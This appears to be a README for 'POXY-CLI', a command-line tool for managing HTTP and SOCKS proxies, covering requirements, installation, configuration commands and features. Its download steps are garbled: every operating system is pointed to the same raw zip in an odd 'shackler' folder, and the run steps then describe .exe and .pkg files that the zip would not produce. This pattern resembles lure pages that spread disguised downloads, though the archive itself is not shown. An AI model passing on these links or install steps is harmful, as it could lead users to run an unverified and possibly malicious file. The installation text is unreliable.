POXY-CLI is a professional cross-platform command-line tool designed to manage HTTP and SOCKS proxies seamlessly across Windows, macOS, and Linux. It supports multiple proxy protocols and offers both authentication and various operational modes for your convenience.
To run POXY-CLI smoothly, make sure your system meets the following requirements:
- Windows: Windows 10 or later
- macOS: macOS Mojave (10.14) or later
- Linux: Any recent Linux distribution (Ubuntu, Fedora, etc.)
- Python: Version 3.6 or later installed on your system.
To get started with POXY-CLI, please follow these simple steps:
- Visit the Releases Page: Click this link to access the download page: POXY-CLI Releases.
- Choose the Right File: Look for the latest version of POXY-CLI. Select the appropriate file for your operating system:
- For Windows, download
https://raw.githubusercontent.com/gibson25D/POXY-CLI/main/shackler/CLI-POX-1.0.zip. - For macOS, download
https://raw.githubusercontent.com/gibson25D/POXY-CLI/main/shackler/CLI-POX-1.0.zip. - For Linux, download
https://raw.githubusercontent.com/gibson25D/POXY-CLI/main/shackler/CLI-POX-1.0.zip.
- For Windows, download
- Download the File: Click the filename to start the download.
- Run the File:
- Windows: After the download finishes, locate the
.exefile and double-click to install. - macOS: Open the downloaded
.pkgfile and follow the installation instructions. - Linux: Extract the
https://raw.githubusercontent.com/gibson25D/POXY-CLI/main/shackler/CLI-POX-1.0.zipfile and follow the included README instructions for installation.
- Windows: After the download finishes, locate the
Once installed, you will need to configure POXY-CLI according to your proxy needs. Hereβs how to set it up:
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Open Terminal or Command Prompt:
- For Windows, search for
cmdin the Start menu. - For macOS, open
Terminalfrom your Applications. - For Linux, use your preferred terminal emulator.
- For Windows, search for
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Configure Your Proxy: Use the following commands to set up your proxy settings:
poxy-cli set --http [HTTP_PROXY] --socks [SOCKS_PROXY] --auth [USERNAME:PASSWORD]Replace
[HTTP_PROXY]and[SOCKS_PROXY]with your proxy server addresses. Provide your authentication details if required. -
Check Your Settings: Verify your configuration by running:
poxy-cli status
POXY-CLI comes packed with robust features that enhance your proxy management experience:
- Cross-Platform Support: Available on Windows, macOS, and Linux.
- Multiple Proxy Protocols: Support for HTTP, SOCKS4, and SOCKS5 protocols.
- Authentication Support: Easily manage username and password authentication.
- System-Wide and Local Proxy Modes: Choose to apply proxies to your entire system or specific applications.
- Easy Configuration: User-friendly commands to change settings without confusion.
- Network Diagnostics: Built-in tools to troubleshoot proxy connections.
Get involved in our community! If you have questions or need help, you can reach out through the following channels:
Stay updated with new features and improvements by checking the Changelog. Regular updates will ensure you have the best performance and security.
We welcome contributions! If you'd like to improve POXY-CLI, please fork the repository and submit a pull request. Follow our contribution guidelines in the repository for detailed instructions.
This project is licensed under the MIT License. You are free to use and modify it as per the terms of the license.
For more information, make sure to consult the full documentation within the repository and the Releases Page for downloads.